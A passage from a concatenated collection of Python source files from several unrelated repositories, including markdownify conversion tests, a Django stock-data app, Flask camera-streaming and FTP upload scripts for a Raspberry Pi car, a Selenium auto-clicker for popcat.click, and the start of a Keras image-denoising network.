('login-customer-id', '9<PASSWORD>')]
result = InterceptorMixin.parse_metadata_to_json(mock_metadata)
self.assertEqual(result, '{\n'
' "developer-token": "<PASSWORD>",\n'
' "login-customer-id": "9999999999",\n'
' "x-goog-api-client": "gl-python/123 '
'grpc/123 gax/123"\n'
'}')
def test_parse_metadata_to_json_with_none(self):
mock_metadata = None
result = InterceptorMixin.parse_metadata_to_json(mock_metadata)
self.assertEqual(result, '{}')
``` |
{
"source": "jiulongw/python-markdownify",
"score": 3
} |
#### File: python-markdownify/tests/test_conversions.py
```python
from markdownify import markdownify as md, ATX, ATX_CLOSED, BACKSLASH, UNDERSCORE
import re
nested_uls = """
<ul>
<li>1
<ul>
<li>a
<ul>
<li>I</li>
<li>II</li>
<li>III</li>
</ul>
</li>
<li>b</li>
<li>c</li>
</ul>
</li>
<li>2</li>
<li>3</li>
</ul>"""
nested_ols = """
<ol>
<li>1
<ol>
<li>a
<ol>
<li>I</li>
<li>II</li>
<li>III</li>
</ol>
</li>
<li>b</li>
<li>c</li>
</ol>
</li>
<li>2</li>
<li>3</li>
</ul>"""
table = re.sub(r'\s+', '', """
<table>
<tr>
<th>Firstname</th>
<th>Lastname</th>
<th>Age</th>
</tr>
<tr>
<td>Jill</td>
<td>Smith</td>
<td>50</td>
</tr>
<tr>
<td>Eve</td>
<td>Jackson</td>
<td>94</td>
</tr>
</table>
""")
table_head_body = re.sub(r'\s+', '', """
<table>
<thead>
<tr>
<th>Firstname</th>
<th>Lastname</th>
<th>Age</th>
</tr>
</thead>
<tbody>
<tr>
<td>Jill</td>
<td>Smith</td>
<td>50</td>
</tr>
<tr>
<td>Eve</td>
<td>Jackson</td>
<td>94</td>
</tr>
</tbody>
</table>
""")
table_missing_text = re.sub(r'\s+', '', """
<table>
<thead>
<tr>
<th></th>
<th>Lastname</th>
<th>Age</th>
</tr>
</thead>
<tbody>
<tr>
<td>Jill</td>
<td></td>
<td>50</td>
</tr>
<tr>
<td>Eve</td>
<td>Jackson</td>
<td>94</td>
</tr>
</tbody>
</table>
""")
def test_chomp():
assert md(' <b></b> ') == ' '
assert md(' <b> </b> ') == ' '
assert md(' <b> </b> ') == ' '
assert md(' <b> </b> ') == ' '
assert md(' <b>s </b> ') == ' **s** '
assert md(' <b> s</b> ') == ' **s** '
assert md(' <b> s </b> ') == ' **s** '
assert md(' <b> s </b> ') == ' **s** '
def test_a():
assert md('<a href="https://google.com">Google</a>') == '[Google](https://google.com)'
assert md('<a href="https://google.com">https://google.com</a>', autolinks=False) == '[https://google.com](https://google.com)'
assert md('<a href="https://google.com">https://google.com</a>') == '<https://google.com>'
assert md('<a href="https://community.kde.org/Get_Involved">https://community.kde.org/Get_Involved</a>') == '<https://community.kde.org/Get_Involved>'
assert md('<a href="https://community.kde.org/Get_Involved">https://community.kde.org/Get_Involved</a>', autolinks=False) == '[https://community.kde.org/Get\\_Involved](https://community.kde.org/Get_Involved)'
def test_a_spaces():
assert md('foo <a href="http://google.com">Google</a> bar') == 'foo [Google](http://google.com) bar'
assert md('foo<a href="http://google.com"> Google</a> bar') == 'foo [Google](http://google.com) bar'
assert md('foo <a href="http://google.com">Google </a>bar') == 'foo [Google](http://google.com) bar'
assert md('foo <a href="http://google.com"></a> bar') == 'foo bar'
def test_a_with_title():
text = md('<a href="http://google.com" title="The "Goog"">Google</a>')
assert text == r'[Google](http://google.com "The \"Goog\"")'
def test_a_shortcut():
text = md('<a href="http://google.com">http://google.com</a>')
assert text == '<http://google.com>'
def test_a_no_autolinks():
text = md('<a href="http://google.com">http://google.com</a>', autolinks=False)
assert text == '[http://google.com](http://google.com)'
def test_b():
assert md('<b>Hello</b>') == '**Hello**'
def test_b_spaces():
assert md('foo <b>Hello</b> bar') == 'foo **Hello** bar'
assert md('foo<b> Hello</b> bar') == 'foo **Hello** bar'
assert md('foo <b>Hello </b>bar') == 'foo **Hello** bar'
assert md('foo <b></b> bar') == 'foo bar'
def test_blockquote():
assert md('<blockquote>Hello</blockquote>') == '\n> Hello\n\n'
def test_blockquote_with_paragraph():
assert md('<blockquote>Hello</blockquote><p>handsome</p>') == '\n> Hello\n\nhandsome\n\n'
def test_nested_blockquote():
text = md('<blockquote>And she was like <blockquote>Hello</blockquote></blockquote>')
assert text == '\n> And she was like \n> > Hello\n> \n> \n\n'
def test_br():
assert md('a<br />b<br />c') == 'a \nb \nc'
def test_em():
assert md('<em>Hello</em>') == '*Hello*'
def test_em_spaces():
assert md('foo <em>Hello</em> bar') == 'foo *Hello* bar'
assert md('foo<em> Hello</em> bar') == 'foo *Hello* bar'
assert md('foo <em>Hello </em>bar') == 'foo *Hello* bar'
assert md('foo <em></em> bar') == 'foo bar'
def test_h1():
assert md('<h1>Hello</h1>') == 'Hello\n=====\n\n'
def test_h2():
assert md('<h2>Hello</h2>') == 'Hello\n-----\n\n'
def test_hn():
assert md('<h3>Hello</h3>') == '### Hello\n\n'
assert md('<h6>Hello</h6>') == '###### Hello\n\n'
def test_hn_chained():
assert md('<h1>First</h1>\n<h2>Second</h2>\n<h3>Third</h3>', heading_style=ATX) == '# First\n\n\n## Second\n\n\n### Third\n\n'
assert md('X<h1>First</h1>', heading_style=ATX) == 'X# First\n\n'
def test_hn_nested_tag_heading_style():
assert md('<h1>A <p>P</p> C </h1>', heading_style=ATX_CLOSED) == '# A P C #\n\n'
assert md('<h1>A <p>P</p> C </h1>', heading_style=ATX) == '# A P C\n\n'
def test_hn_nested_simple_tag():
tag_to_markdown = [
("strong", "**strong**"),
("b", "**b**"),
("em", "*em*"),
("i", "*i*"),
("p", "p"),
("a", "a"),
("div", "div"),
("blockquote", "blockquote"),
]
for tag, markdown in tag_to_markdown:
assert md('<h3>A <' + tag + '>' + tag + '</' + tag + '> B</h3>') == '### A ' + markdown + ' B\n\n'
assert md('<h3>A <br>B</h3>', heading_style=ATX) == '### A B\n\n'
# Nested lists not supported
# assert md('<h3>A <ul><li>li1</i><li>l2</li></ul></h3>', heading_style=ATX) == '### A li1 li2 B\n\n'
def test_hn_nested_img():
assert md('<img src="/path/to/img.jpg" alt="Alt text" title="Optional title" />') == ''
assert md('<img src="/path/to/img.jpg" alt="Alt text" />') == ''
image_attributes_to_markdown = [
("", ""),
("alt='Alt Text'", "Alt Text"),
("alt='Alt Text' title='Optional title'", "Alt Text"),
]
for image_attributes, markdown in image_attributes_to_markdown:
assert md('<h3>A <img src="/path/to/img.jpg " ' + image_attributes + '/> B</h3>') == '### A ' + markdown + ' B\n\n'
def test_hr():
assert md('Hello<hr>World') == 'Hello\n\n---\n\nWorld'
assert md('Hello<hr />World') == 'Hello\n\n---\n\nWorld'
assert md('<p>Hello</p>\n<hr>\n<p>World</p>') == 'Hello\n\n\n\n\n---\n\n\nWorld\n\n'
def test_head():
assert md('<head>head</head>') == 'head'
def test_atx_headings():
assert md('<h1>Hello</h1>', heading_style=ATX) == '# Hello\n\n'
assert md('<h2>Hello</h2>', heading_style=ATX) == '## Hello\n\n'
def test_atx_closed_headings():
assert md('<h1>Hello</h1>', heading_style=ATX_CLOSED) == '# Hello #\n\n'
assert md('<h2>Hello</h2>', heading_style=ATX_CLOSED) == '## Hello ##\n\n'
def test_i():
assert md('<i>Hello</i>') == '*Hello*'
def test_ol():
assert md('<ol><li>a</li><li>b</li></ol>') == '1. a\n2. b\n'
assert md('<ol start="3"><li>a</li><li>b</li></ol>') == '3. a\n4. b\n'
def test_p():
assert md('<p>hello</p>') == 'hello\n\n'
def test_strong():
assert md('<strong>Hello</strong>') == '**Hello**'
def test_ul():
assert md('<ul><li>a</li><li>b</li></ul>') == '* a\n* b\n'
def test_nested_ols():
assert md(nested_ols) == '\n1. 1\n\t1. a\n\t\t1. I\n\t\t2. II\n\t\t3. III\n\t2. b\n\t3. c\n2. 2\n3. 3\n'
def test_inline_ul():
assert md('<p>foo</p><ul><li>a</li><li>b</li></ul><p>bar</p>') == 'foo\n\n* a\n* b\n\nbar\n\n'
def test_nested_uls():
"""
Nested ULs should alternate bullet characters.
"""
assert md(nested_uls) == '\n* 1\n\t+ a\n\t\t- I\n\t\t- II\n\t\t- III\n\t+ b\n\t+ c\n* 2\n* 3\n'
def test_bullets():
assert md(nested_uls, bullets='-') == '\n- 1\n\t- a\n\t\t- I\n\t\t- II\n\t\t- III\n\t- b\n\t- c\n- 2\n- 3\n'
def test_li_text():
assert md('<ul><li>foo <a href="#">bar</a></li><li>foo bar </li><li>foo <b>bar</b> <i>space</i>.</ul>') == '* foo [bar](#)\n* foo bar\n* foo **bar** *space*.\n'
def test_img():
assert md('<img src="/path/to/img.jpg" alt="Alt text" title="Optional title" />') == ''
assert md('<img src="/path/to/img.jpg" alt="Alt text" />') == ''
def test_div():
assert md('Hello</div> World') == 'Hello World'
def test_table():
assert md(table) == '| Firstname | Lastname | Age |\n| --- | --- | --- |\n| Jill | Smith | 50 |\n| Eve | Jackson | 94 |'
assert md(table_head_body) == '| Firstname | Lastname | Age |\n| --- | --- | --- |\n| Jill | Smith | 50 |\n| Eve | Jackson | 94 |'
assert md(table_missing_text) == '| | Lastname | Age |\n| --- | --- | --- |\n| Jill | | 50 |\n| Eve | Jackson | 94 |'
def test_strong_em_symbol():
assert md('<strong>Hello</strong>', strong_em_symbol=UNDERSCORE) == '__Hello__'
assert md('<b>Hello</b>', strong_em_symbol=UNDERSCORE) == '__Hello__'
assert md('<em>Hello</em>', strong_em_symbol=UNDERSCORE) == '_Hello_'
assert md('<i>Hello</i>', strong_em_symbol=UNDERSCORE) == '_Hello_'
def test_newline_style():
assert md('a<br />b<br />c', newline_style=BACKSLASH) == 'a\\\nb\\\nc'
``` |
{
"source": "jiun0507/minestock",
"score": 2
} |
#### File: management/commands/import_company.py
```python
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
from polygon.rest.models.definitions import Company
from company.models import CompanyModel
from Interface.polygon_api import PolygonInterface
from keys import Keys
class Command(BaseCommand):
help = "Closes the specified poll for voting"
def add_arguments(self, parser):
parser.add_argument("start", type=int)
parser.add_argument("end", type=int)
def handle(self, *args, **options):
start = options["start"]
end = options["end"]
self.polygon = PolygonInterface(Keys())
for page_num in list(range(start, end)):
tickers = self.polygon.get_polygon_company_list(page=page_num)
for ticker in tickers:
try:
company = CompanyModel(
ticker=ticker["ticker"],
name=ticker["name"],
market=ticker["market"],
locale=ticker["locale"],
active=ticker["active"],
)
company.save()
except IntegrityError:
pass
```
#### File: minestock/financial_statement/models.py
```python
from dataclasses import dataclass
from datetime import datetime
from django.db import models
from django.db.models.fields import DateTimeField
from django.urls import reverse
@dataclass
class FinancialStatementEntity:
ticker: str
period: str
calendar_date: str
report_period: str
updated: str
accumulated_other_comprehensive_income: int
assets: int
assets_average: int
assets_current: int
asset_turnover: int
assets_non_current: int
book_value_per_share: int
capital_expenditure: int
cash_and_equivalents: int
cash_and_equivalentsUSD: int
cost_of_revenue: int
consolidated_income: int
current_ratio: int
debt_to_equity_ratio: int
debt: int
debt_current: int
debt_non_current: int
debtUSD: int
deferred_revenue: int
depreciation_amortization_and_accretion: int
deposits: int
dividend_yield: int
dividends_per_basic_common_share: int
earning_before_interest_taxes: int
earnings_before_interest_taxes_depreciation_amortization: int
EBITDA_margin: int
earnings_before_interest_taxes_depreciation_amortizationUSD: int
earning_before_interest_taxesUSD: int
earnings_before_tax: int
earnings_per_basic_share: int
earnings_per_diluted_share: int
earnings_per_basic_shareUSD: int
shareholders_equity: int
average_equity: int
shareholders_equityUSD: int
enterprise_value: int
enterprise_value_overEBIT: int
enterprise_value_overEBITDA: int
free_cash_flow: int
free_cash_flow_per_share: int
foreign_currencyUSD_exchange_Rate: int
gross_profit: int
gross_margin: int
goodwill_and_intangible_assets: int
interest_expense: int
invested_Capital: int
invested_capital_average: int
inventory: int
investments: int
investments_Current: int
investments_non_current: int
total_liabilities: int
current_liabilities: int
liabilities_non_current: int
market_capitalization: int
net_cash_flow: int
net_cash_flow_business_acquisitions_disposals: int
issuance_equity_shares: int
issuance_debt_securities: int
payment_dividends_other_cash_distributions: int
net_cash_flow_from_financing: int
net_cash_flow_from_investing: int
net_cash_flow_investment_acquisitions_disposals: int
net_cash_flow_from_operations: int
effect_of_exchange_rate_changes_on_cash: int
net_income: int
net_income_common_stock: int
net_income_common_stockUSD: int
net_loss_income_from_discontinued_operations: int
net_income_to_non_controlling_interests: int
profit_margin: int
operating_expenses: int
operating_income: int
trade_and_non_trade_payables: int
payout_ratio: int
price_to_book_value: int
price_earnings: int
price_to_earnings_ratio: int
property_plant_equipment_net: int
preferred_dividends_income_statement_impact: int
share_price_adjusted_close: int
price_sales: int
price_to_sales_ratio: int
trade_and_non_trade_receivables: int
accumulated_retained_earnings_deficit: int
revenues: int
revenuesUSD: int
research_and_development_expense: int
return_on_average_assets: int
return_on_average_equity: int
return_on_invested_capital: int
return_on_sales: int
share_based_compensation: int
selling_general_and_administrative_expense: int
share_factor: int
shares: int
weighted_average_shares: int
weighted_average_shares_diluted: int
sales_per_share: int
tangible_asset_value: int
tax_assets: int
income_tax_expense: int
tax_liabilities: int
tangible_assets_book_value_per_share: int
working_capital: int
class FinancialStatement(models.Model):
ticker = models.CharField(max_length=10)
period = models.CharField(max_length=10)
calendar_date = models.CharField(max_length=10)
report_period = models.CharField(max_length=10)
updated = models.CharField(max_length=10)
accumulated_other_comprehensive_income = models.IntegerField()
assets = models.IntegerField()
assets_average = models.IntegerField()
assets_current = models.IntegerField()
asset_turnover = models.IntegerField()
assets_non_current = models.IntegerField()
book_value_per_share = models.IntegerField()
capital_expenditure = models.IntegerField()
cash_and_equivalents = models.IntegerField()
cash_and_equivalentsUSD = models.IntegerField()
cost_of_revenue = models.IntegerField()
consolidated_income = models.IntegerField()
current_ratio = models.IntegerField()
debt_to_equity_ratio = models.IntegerField()
debt = models.IntegerField()
debt_current = models.IntegerField()
debt_non_current = models.IntegerField()
debtUSD = models.IntegerField()
deferred_revenue = models.IntegerField()
depreciation_amortization_and_accretion = models.IntegerField()
deposits = models.IntegerField()
dividend_yield = models.IntegerField()
dividends_per_basic_common_share = models.IntegerField()
earning_before_interest_taxes = models.IntegerField()
earnings_before_interest_taxes_depreciation_amortization = models.IntegerField()
EBITDA_margin = models.IntegerField()
earnings_before_interest_taxes_depreciation_amortizationUSD = models.IntegerField()
earning_before_interest_taxesUSD = models.IntegerField()
earnings_before_tax = models.IntegerField()
earnings_per_basic_share = models.IntegerField()
earnings_per_diluted_share = models.IntegerField()
earnings_per_basic_shareUSD = models.IntegerField()
shareholders_equity = models.IntegerField()
average_equity = models.IntegerField()
shareholders_equityUSD = models.IntegerField()
enterprise_value = models.IntegerField()
enterprise_value_overEBIT = models.IntegerField()
enterprise_value_overEBITDA = models.IntegerField()
free_cash_flow = models.IntegerField()
free_cash_flow_per_share = models.IntegerField()
foreign_currencyUSD_exchange_Rate = models.IntegerField()
gross_profit = models.IntegerField()
gross_margin = models.IntegerField()
goodwill_and_intangible_assets = models.IntegerField()
interest_expense = models.IntegerField()
invested_Capital = models.IntegerField()
invested_capital_average = models.IntegerField()
inventory = models.IntegerField()
investments = models.IntegerField()
investments_Current = models.IntegerField()
investments_non_current = models.IntegerField()
total_liabilities = models.IntegerField()
current_liabilities = models.IntegerField()
liabilities_non_current = models.IntegerField()
market_capitalization = models.IntegerField()
net_cash_flow = models.IntegerField()
net_cash_flow_business_acquisitions_disposals = models.IntegerField()
issuance_equity_shares = models.IntegerField()
issuance_debt_securities = models.IntegerField()
payment_dividends_other_cash_distributions = models.IntegerField()
net_cash_flow_from_financing = models.IntegerField()
net_cash_flow_from_investing = models.IntegerField()
net_cash_flow_investment_acquisitions_disposals = models.IntegerField()
net_cash_flow_from_operations = models.IntegerField()
effect_of_exchange_rate_changes_on_cash = models.IntegerField()
net_income = models.IntegerField()
net_income_common_stock = models.IntegerField()
net_income_common_stockUSD = models.IntegerField()
net_loss_income_from_discontinued_operations = models.IntegerField()
net_income_to_non_controlling_interests = models.IntegerField()
profit_margin = models.IntegerField()
operating_expenses = models.IntegerField()
operating_income = models.IntegerField()
trade_and_non_trade_payables = models.IntegerField()
payout_ratio = models.IntegerField()
price_to_book_value = models.IntegerField()
price_earnings = models.IntegerField()
price_to_earnings_ratio = models.IntegerField()
property_plant_equipment_net = models.IntegerField()
preferred_dividends_income_statement_impact = models.IntegerField()
share_price_adjusted_close = models.IntegerField()
price_sales = models.IntegerField()
price_to_sales_ratio = models.IntegerField()
trade_and_non_trade_receivables = models.IntegerField()
accumulated_retained_earnings_deficit = models.IntegerField()
revenues = models.IntegerField()
revenuesUSD = models.IntegerField()
research_and_development_expense = models.IntegerField()
return_on_average_assets = models.IntegerField()
return_on_average_equity = models.IntegerField()
return_on_invested_capital = models.IntegerField()
return_on_sales = models.IntegerField()
share_based_compensation = models.IntegerField()
selling_general_and_administrative_expense = models.IntegerField()
share_factor = models.IntegerField()
shares = models.IntegerField()
weighted_average_shares = models.IntegerField()
weighted_average_shares_diluted = models.IntegerField()
sales_per_share = models.IntegerField()
tangible_asset_value = models.IntegerField()
tax_assets = models.IntegerField()
income_tax_expense = models.IntegerField()
tax_liabilities = models.IntegerField()
tangible_assets_book_value_per_share = models.IntegerField()
working_capital = models.IntegerField()
def get_absolute_url(self):
return reverse(
"financial_statement:financial_statement", kwargs={"id": self.id}
)
class Meta:
constraints = [
models.UniqueConstraint(
fields=["ticker", "period", "calendar_date", "report_period"],
name="financial statement quarterly/yearly restraint",
),
]
```
#### File: management/commands/price_alert.py
```python
from Interface.iex_api import IEXInterface
from django.core.management.base import BaseCommand, CommandError
from company.models import CompanyModel
from Interface.polygon_api import PolygonInterface
from keys import Keys
class Command(BaseCommand):
help = "Closes the specified poll for voting"
def add_arguments(self, parser):
# parser.add_argument("start", type=int)
pass
def handle(self, *args, **options):
iex_interface = IEXInterface(Keys())
companies = CompanyModel.objects.filter(notification__isnull=False)
for company in companies:
price = iex_interface.get_ticker_quote(ticker=company.ticker)
```
#### File: minestock/valuation/forms.py
```python
from django import forms
from . import models
class ValuationForm(forms.Form):
DCF = "dcf"
REPRODUCTIOIN_COST = "reproduction_cst"
OTHER = "other"
METHOD_CHOICES = (
(DCF, "DCF"),
(REPRODUCTIOIN_COST, "Reproduction_cost"),
(OTHER, "Other"),
)
review = forms.CharField()
ticker = forms.CharField()
method = forms.ChoiceField(choices=METHOD_CHOICES)
value = forms.FloatField()
formula = forms.CharField()
financial_statement_id = forms.IntegerField(widget=forms.HiddenInput())
# financial_statement_id.widget.attrs.update({"readonly": True})
financial_statement_id.widget.attrs["readonly"] = True
def clean(self):
review = self.cleaned_data.get("review")
ticker = self.cleaned_data.get("ticker")
method = self.cleaned_data.get("method")
value = self.cleaned_data.get("value")
formula = self.cleaned_data.get("formula")
if "process" in self.data:
raise forms.ValidationError("The formula is computed.")
else:
raise forms.ValidationError("This is submit")
if ticker == None or value == None or method == None:
return None
return self.cleaned_data
``` |
{
"source": "Jiunan73/flask",
"score": 3
} |
#### File: flask/back/app_2cam.py
```python
from importlib import import_module
import os
import time
from flask import Flask, render_template, Response
# import camera driver
#if os.environ.get('CAMERA'):
# Camera = import_module('camera_' + os.environ['CAMERA']).Camera
#else:
# from camera import Camera
# Raspberry Pi camera module (requires picamera package)
from camera_opencv import Camera
from camera_opencv2 import Camera as Camera2
import RPi.GPIO as gpio
GOPIN=18
BACKPIN=23
LEFTPIN=24
RIGHTPIN=25
gpio.setwarnings(False)
gpio.setmode(gpio.BCM)
gpio.setup(GOPIN, gpio.OUT)
gpio.setup(BACKPIN, gpio.OUT)
gpio.setup(LEFTPIN, gpio.OUT)
gpio.setup(RIGHTPIN, gpio.OUT)
app = Flask(__name__)
@app.route('/')
@app.route('/<cmd>')
def index(cmd=None):
"""Video streaming home page."""
if cmd == 'go':
setio(True, False, False, False)
elif cmd == 'stop':
setio(False, False, False, False)
elif cmd == 'back':
setio(False, True, False, False)
elif cmd == 'right':
setio(False, False, True, False)
elif cmd == 'left':
setio(False, False, False, True)
return render_template('index.html',cmd=cmd)
def setio(p14, p15, p18, p23):
gpio.output(GOPIN, p14)
gpio.output(BACKPIN, p15)
gpio.output(LEFTPIN, p18)
gpio.output(RIGHTPIN, p23)
"""time.sleep(1)
gpio.output(14, False)
gpio.output(15, False)
gpio.output(18, False)
gpio.output(23, False) """
def index():
"""Video streaming home page."""
return render_template('index.html')
def gen0(camera):
"""Video streaming generator function."""
cnt=[0,0,0,0]
while True:
frame = camera.get_frame()
for i in range(4):
sensor1=camera.get_sensor(i)
if sensor1 < 10 :
print(i)
print ("<10cm")
cnt[i]=cnt[i]+1
if cnt > 10 :
setio(False, False, False, False)
cnt[i]=0
else:
cnt[i]=0
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
def gen2(camera):
"""Video streaming generator function."""
while True:
frame = camera.get_frame()
#print(camera.get_sensor())
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@app.route('/video_feed0')
def video_feed0():
"""Video streaming route. Put this in the src attribute of an img tag."""
a=Camera
print("Video streaming=",a.video_source)
return Response(gen0(a()),
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/video_feed2')
def video_feed2():
"""Video streaming route. Put this in the src attribute of an img tag."""
b=Camera2
print("Video streaming=",b.video_source)
return Response(gen2(b()),
mimetype='multipart/x-mixed-replace; boundary=frame')
if __name__ == '__main__':
app.run(host='0.0.0.0', threaded=True)
```
#### File: Jiunan73/flask/camera_opencv3.py
```python
import requests,time
from base_camera3 import BaseCamera
class Camera(BaseCamera):
@staticmethod
def frames():
while True:
r=requests.get('http://192.168.2.161/image/jpeg.cgi',auth=('admin',''))
img=r.content
yield img
```
#### File: Jiunan73/flask/ftp.py
```python
import time,os,datetime
from ftplib import FTP
fall_file=''
ir_file=''
def ftp_upload(filepath,dirpath):
IP = '192.168.31.102'
user = 'johnlin'
password = '<PASSWORD>'
filename = os.path.basename(filepath)
ftp=FTP()
#ftp.set_debuglevel(2)
ftp.connect(IP)
ftp.login(user,password)
ftp.cwd("/home/johnlin/ftp/"+dirpath)
ftp.storbinary('STOR %s'%filename, open(filepath, 'rb',8192))
print('success')
if __name__ == '__main__':
while True:
try:
datestr=datetime.datetime.now().strftime('%Y%m%d')
b=os.listdir('static/ir_cam/'+datestr+'/AD-HF048-P-192.168.1.20')
a=sorted(b)
ir_path='static/ir_cam/'+datestr+'/AD-HF048-P-192.168.1.20/'+a[len(a)-1]
print(ir_path)
if not ir_path==ir_file:
print('ftp upload')
ftp_upload(ir_path,'ir')
ir_file=ir_path
except:
print('ir error')
try:
b= os.listdir('static/ir_cam/fall/')
for s in b:
if s.endswith('.jpg')==False:
#print('del ',s)
b.remove(s)
a=sorted(b)
fall_path='static/ir_cam/fall/'+a[len(a)-1]
print(fall_path)
if not fall_path==fall_file:
print('ftp upload')
ftp_upload(fall_path,'fall')
fall_file=fall_path
except:
print('fall error')
time.sleep(5)
```
#### File: flask/home/client.py
```python
import sys
import socket
import threading
import os
def connectTCP(ip,port):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((ip,port))
return client
def main():
while True:
remote_server = connectTCP('10.97.82.24',5001)
time.sleep(5)
remote_server.close()
time.sleep(1)
if __name__ == '__main__':
main()
```
#### File: flask/home/ftp.py
```python
import time,os
from ftplib import FTP
fall_file=''
ir_file=''
def ftp_upload(filepath):
IP = '127.0.0.1'
user = 'johnlin'
password = '<PASSWORD>'
filename = os.path.basename(filepath)
ftp=FTP()
#ftp.set_debuglevel(2)
ftp.connect(IP)
ftp.login(user,password)
ftp.cwd("/home/johnlin/ftp")
ftp.storbinary('STOR %s'%filename, open(filepath, 'rb',8192))
print('success')
if __name__ == '__main__':
while True:
b=os.listdir('/home/pi/flask/static/ir_cam/20200807/AD-HF048-P-192.168.1.20')
a=sorted(b)
ir_path='/home/pi/flask/static/ir_cam/20200807/AD-HF048-P-192.168.1.20/'+a[len(a)-1]
if not ir_path==ir_file:
ftp_upload(ir_path)
ir_file=ir_path
b= os.listdir('/home/pi/flask/static/ir_cam/fall/')
for s in b:
if s.endswith('.jpg')==False:
print('del ',s)
b.remove(s)
a=sorted(b)
fall_path='/home/pi/flask/static/ir_cam/fall/'+a[len(a)-1]
print(fall_path)
if not fall_path==fall_file:
ftp_upload(fall_path)
fall_file=fall_path
time.sleep(5)
```
#### File: flask/home/serverTCP.py
```python
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 4001
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print "[*] Listening on %s:%d" % (bind_ip, bind_port)
def handle_client(client_socket):
request = client_socket.recv(1024)
print "[*] Received: %s" % request
client_socket.send("ACK!")
client_socket.close()
while True:
client, addr = server.accept()
print "[*] Acepted connection from: %s:%d" % (addr[0],addr[1])
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
```
#### File: static/ir_cam/upload.py
```python
from ftplib import FTP
import os
import fileinput
import time
# 该条件永远为true,循环将无限执行下去
def ftp_upload(localfile, remotefile):
fp = open(localfile, 'rb')
ftp.storbinary('STOR %s' % os.path.basename(localfile), fp, 1024)
fp.close()
#print ("after upload " + localfile + " to " + remotefile)
print('1')
localdir = "/home/thomaslee/Desktop/Fall_detect/fall/image/"
def upload_img(file):
ftp_upload(localdir +"/"+ file, file)
while(True):
time.sleep(10)
ftp = FTP()
ftp.set_debuglevel(2)
try:
ftp.connect('192.168.0.122', 21)
ftp.login('pi','Auo+1231')
ftp.cwd('/home/pi/tmp')
except Exception as e:
print(e)
continue
lastlist = []
newfiles = os.listdir(localdir)
#newfiles = list(set(currentlist) - set(lastlist))
if len(newfiles) == 0:
print ('No files need to upload')
else:
print(len(newfiles))
for needupload in newfiles:
print( "uploading " + localdir + '/'+ needupload)
upload_img(needupload)
ftp.quit()
``` |
{
"source": "jiunbae/auto-popcat",
"score": 3
} |
#### File: jiunbae/auto-popcat/auto-cat.py
```python
import argparse
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
class Handler:
class URL:
MAIN = "https://popcat.click"
class Config:
DEBUG = False
HEADLESS = False
def __init__(self, driver_path: str):
options = Options()
if Handler.Config.HEADLESS:
options.add_argument("headless")
options.add_argument("window-size=540,1024")
options.add_argument("disable-gpu")
options.add_argument("disable-infobars")
# options.add_argument("disable-popup-blocking")
options.add_argument("disable-extensions")
options.add_argument("start-maximized")
options.add_argument("no-sandbox")
options.add_argument("disable-dev-shm-usage")
options.add_argument('ignore-certificate-errors')
options.add_argument('ignore-ssl-errors')
options.add_experimental_option('prefs', {
'profile.default_content_setting_values': {
# 'cookies': 2,
# 'images': 2,
'plugins': 2,
'popups': 2,
'geolocation': 2,
'notifications': 2,
'auto_select_certificate': 2,
'fullscreen': 2,
'mouselock': 2,
'mixed_script': 2,
'media_stream': 2,
'media_stream_mic': 2,
'media_stream_camera': 2,
'protocol_handlers': 2,
'ppapi_broker': 2,
'automatic_downloads': 2,
'midi_sysex': 2,
'push_messaging': 2,
'ssl_cert_decisions': 2,
'metro_switch_to_desktop': 2,
'protected_media_identifier': 2,
'app_banner': 2,
'site_engagement': 2,
'durable_storage': 2
}
})
self.driver = webdriver.Chrome(driver_path, options=options)
def __call__(self, count: int = 0):
self.driver.get(Handler.URL.MAIN)
if not count:
count = -1
while count:
element = self.driver.find_element_by_class_name('cat-img')
element.click()
count -= 1
def main(args: argparse.Namespace):
Handler.Config.DEBUG = args.debug
Handler.Config.HEADLESS = args.headless
handler = Handler(args.driver)
handler(args.count)
if __name__ == "__main__":
parser = argparse.ArgumentParser("Auto Cat Click")
parser.add_argument('--driver', type=str, default='./bin/chromedriver.exe',
help="driver path")
parser.add_argument('--count', type=int, default=0,
help="click $count times")
parser.add_argument('--debug', action='store_true', default=False,
help="driver path")
parser.add_argument('--headless', action='store_true', default=False,
help="headless option")
args = parser.parse_args()
main(args)
``` |
{
"source": "jiunbae/crawltools",
"score": 3
} |
#### File: crawltools/utils/beholder.py
```python
from typing import Callable
from collections import defaultdict
class Beholder(type):
__inheritors__ = defaultdict(dict)
def __new__(mcs, name, bases, dct):
klass = type.__new__(mcs, name, bases, dct)
for attribute in filter(
lambda attr:
not attr.startswith('__') and
not callable(getattr(klass, attr)), dir(klass)):
setattr(mcs, attribute, getattr(klass, attribute))
for base in klass.mro()[1:-1]:
mcs.__inheritors__[base][Beholder._process(klass.__name__)] = klass
return klass
@staticmethod
def _process(name):
return name.lower().replace('-', '_')
@property
def __modules__(cls):
return cls.__inheritors__[cls]
def get(cls, name, default=None, process: Callable = None):
return cls.__modules__.get((process or cls._process)(name), default)
``` |
{
"source": "jiunbae/ITE4053",
"score": 3
} |
#### File: ImageDenoising/network/denoising.py
```python
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras import models as KM
from tensorflow.keras import layers as KL
class DenoisingNetwork(object):
def __new__(cls, mode: str) \
-> KM.Model:
assert mode in ['base', 'skip', 'bn']
inputs = KL.Input(shape=[None, None, 3],
name="input_image")
x = inputs
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer1")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer2")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer3")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
